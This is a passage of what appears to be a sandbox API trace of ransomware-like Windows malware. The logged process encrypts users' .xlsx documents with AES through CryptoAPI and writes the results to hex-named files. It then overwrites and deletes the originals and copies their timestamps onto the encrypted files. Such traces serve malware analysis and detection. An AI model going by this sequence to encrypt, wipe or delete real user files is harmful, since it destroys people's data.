dwFlags=0x0, pbData=0x2245e10*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x2245e10*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0074.458] WriteFile (in: hFile=0x380, lpBuffer=0x2245e60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x2245e60*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0074.458] CloseHandle (hObject=0x380) returned 1 [0074.458] CloseHandle (hObject=0x36c) returned 1 [0074.459] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0074.459] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0074.459] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0074.459] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382", lpFilePart=0x0) returned 0x48 [0074.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0074.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4826eff1d06fe161af3b31d40a228382"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.459] GetFileType (hFile=0x36c) returned 0x1 [0074.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0074.459] GetFileType (hFile=0x36c) returned 0x1 [0074.459] ReadFile (in: hFile=0x36c, lpBuffer=0x2247558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2247558*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.460] ReadFile (in: hFile=0x36c, lpBuffer=0x2247558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2247558*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.461] ReadFile (in: hFile=0x36c, lpBuffer=0x2247558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2247558*, lpNumberOfBytesRead=0x1bf5da48*=0x5e0, lpOverlapped=0x0) returned 1 [0074.462] ReadFile (in: hFile=0x36c, lpBuffer=0x2247558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2247558*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0074.462] CloseHandle (hObject=0x36c) returned 1 [0074.463] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382.info", lpFilePart=0x0) returned 0x4d [0074.463] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0074.463] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4826eff1d06fe161af3b31d40a228382.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.464] GetFileType (hFile=0x36c) returned 0x1 [0074.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0074.464] GetFileType (hFile=0x36c) returned 0x1 [0074.464] WriteFile (in: hFile=0x36c, lpBuffer=0x2253c08*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x2253c08*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0074.465] CloseHandle (hObject=0x36c) returned 1 [0074.466] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", lpFilePart=0x0) returned 0x3e [0074.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0074.466] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hgjiza52n2jsimcnl.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a1e2590, ftCreationTime.dwHighDateTime=0x1d4b930, ftLastAccessTime.dwLowDateTime=0xb9148fa0, ftLastAccessTime.dwHighDateTime=0x1d4b166, ftLastWriteTime.dwLowDateTime=0xb9148fa0, ftLastWriteTime.dwHighDateTime=0x1d4b166, nFileSizeHigh=0x0, nFileSizeLow=0x25dc)) returned 1 [0074.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0074.466] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", lpFilePart=0x0) returned 0x3e [0074.466] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", dwFileAttributes=0x80) returned 1 [0074.466] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", lpFilePart=0x0) returned 0x3e [0074.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0074.466] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hgjiza52n2jsimcnl.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x225b810 | out: lpFileInformation=0x225b810*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x3a1e2590, ftCreationTime.dwHighDateTime=0x1d4b930, ftLastAccessTime.dwLowDateTime=0xb9148fa0, ftLastAccessTime.dwHighDateTime=0x1d4b166, ftLastWriteTime.dwLowDateTime=0xb9148fa0, ftLastWriteTime.dwHighDateTime=0x1d4b166, nFileSizeHigh=0x0, nFileSizeLow=0x25dc)) returned 1 [0074.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0074.466] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", lpFilePart=0x0) returned 0x3e [0074.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0074.466] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hgjiza52n2jsimcnl.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.466] GetFileType (hFile=0x36c) returned 0x1 [0074.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0074.467] GetFileType (hFile=0x36c) returned 0x1 [0074.467] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.467] WriteFile (in: hFile=0x36c, lpBuffer=0x225bcd8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225bcd8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.468] WriteFile (in: hFile=0x36c, lpBuffer=0x225bcd8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225bcd8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.468] WriteFile (in: hFile=0x36c, lpBuffer=0x225bcd8*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x225bcd8*, lpNumberOfBytesWritten=0x1bf5daa8*=0x600, lpOverlapped=0x0) returned 1 [0074.469] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.469] WriteFile (in: hFile=0x36c, lpBuffer=0x225bcd8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225bcd8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.470] WriteFile (in: hFile=0x36c, lpBuffer=0x225bcd8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225bcd8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.470] WriteFile (in: hFile=0x36c, lpBuffer=0x225bcd8*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x225bcd8*, lpNumberOfBytesWritten=0x1bf5daa8*=0x600, lpOverlapped=0x0) returned 1 [0074.470] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.471] WriteFile (in: hFile=0x36c, lpBuffer=0x225bcd8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225bcd8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.472] WriteFile (in: hFile=0x36c, lpBuffer=0x225bcd8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225bcd8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.472] WriteFile (in: hFile=0x36c, lpBuffer=0x225bcd8*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x225bcd8*, lpNumberOfBytesWritten=0x1bf5daa8*=0x600, lpOverlapped=0x0) returned 1 [0074.472] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.473] WriteFile (in: hFile=0x36c, lpBuffer=0x225bcd8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225bcd8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.474] WriteFile (in: hFile=0x36c, lpBuffer=0x225bcd8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225bcd8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.679] WriteFile (in: hFile=0x36c, lpBuffer=0x225bcd8*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x225bcd8*, lpNumberOfBytesWritten=0x1bf5daa8*=0x600, lpOverlapped=0x0) returned 1 [0074.679] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0074.679] SetEndOfFile (hFile=0x36c) returned 1 [0074.680] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0074.681] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", lpFilePart=0x0) returned 0x3e [0074.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.681] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hgjiza52n2jsimcnl.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.682] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0074.682] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", lpFilePart=0x0) returned 0x3e [0074.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hgjiza52n2jsimcnl.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.682] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0074.682] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", lpFilePart=0x0) returned 0x3e [0074.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hgjiza52n2jsimcnl.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.682] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0074.682] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", lpFilePart=0x0) returned 0x3e [0074.682] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hgjiza52n2jsimcnl.xlsx")) returned 1 [0074.683] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", lpFilePart=0x0) returned 0x3e [0074.684] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382", lpFilePart=0x0) returned 0x48 [0074.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.684] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4826eff1d06fe161af3b31d40a228382"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.684] GetFileType (hFile=0x36c) returned 0x1 [0074.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.684] GetFileType (hFile=0x36c) returned 0x1 [0074.684] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0074.684] CloseHandle (hObject=0x36c) returned 1 [0074.684] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382", lpFilePart=0x0) returned 0x48 [0074.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.684] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4826eff1d06fe161af3b31d40a228382"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.684] GetFileType (hFile=0x36c) returned 0x1 [0074.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.684] GetFileType (hFile=0x36c) returned 0x1 [0074.684] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0074.684] CloseHandle (hObject=0x36c) returned 1 [0074.685] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382", lpFilePart=0x0) returned 0x48 [0074.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.685] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4826eff1d06fe161af3b31d40a228382"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.685] GetFileType (hFile=0x36c) returned 0x1 [0074.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.685] GetFileType (hFile=0x36c) returned 0x1 [0074.685] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0074.685] CloseHandle (hObject=0x36c) returned 1 [0074.685] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", lpFilePart=0x0) returned 0x3d [0074.686] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", lpFilePart=0x0) returned 0x3d [0074.686] CryptAcquireContextW (in: phProv=0x1bf5da68, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5da68*=0x1a5b6e10) returned 1 [0074.687] CryptImportKey (in: hProv=0x1a5b6e10, pbData=0x225f140, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a626ad0) returned 1 [0074.687] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.687] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0074.687] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x225f230, pdwDataLen=0x1bf5db30 | out: pbData=0x225f230*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0074.687] CryptImportKey (in: hProv=0x1a5b6e10, pbData=0x225f350, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626fa0) returned 1 [0074.687] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.687] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.687] CryptDuplicateKey (in: hKey=0x1a626fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a6269f0) returned 1 [0074.687] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.687] CryptSetKeyParam (hKey=0x1a6269f0, dwParam=0x4, pbData=0x225f498*=0x1, dwFlags=0x0) returned 1 [0074.687] CryptSetKeyParam (hKey=0x1a6269f0, dwParam=0x1, pbData=0x225f448, dwFlags=0x0) returned 1 [0074.688] CryptDestroyKey (hKey=0x1a626fa0) returned 1 [0074.688] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0074.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", lpFilePart=0x0) returned 0x3d [0074.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0074.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jo5pyafrjdxunxxq.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.688] GetFileType (hFile=0x36c) returned 0x1 [0074.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0074.688] GetFileType (hFile=0x36c) returned 0x1 [0074.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7", lpFilePart=0x0) returned 0x48 [0074.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0074.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4b1e059cebd8a7ef3dd31ed52aaf4dd7"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x380 [0074.690] GetFileType (hFile=0x380) returned 0x1 [0074.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0074.690] GetFileType (hFile=0x380) returned 0x1 [0074.691] ReadFile (in: hFile=0x36c, lpBuffer=0x225f868, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x225f868*, lpNumberOfBytesRead=0x1bf5da28*=0x981c, lpOverlapped=0x0) returned 1 [0074.691] CryptEncrypt (in: hKey=0x1a6269f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2273880*, pdwDataLen=0x1bf5da80*=0x9810, dwBufLen=0x9810 | out: pbData=0x2273880*, pdwDataLen=0x1bf5da80*=0x9810) returned 1 [0074.692] WriteFile (in: hFile=0x380, lpBuffer=0x2273880*, nNumberOfBytesToWrite=0x9810, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x2273880*, lpNumberOfBytesWritten=0x1bf5da18*=0x9810, lpOverlapped=0x0) returned 1 [0074.693] ReadFile (in: hFile=0x36c, lpBuffer=0x225f868, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x225f868*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0074.693] CryptEncrypt (in: hKey=0x1a6269f0, hHash=0x0, Final=0, 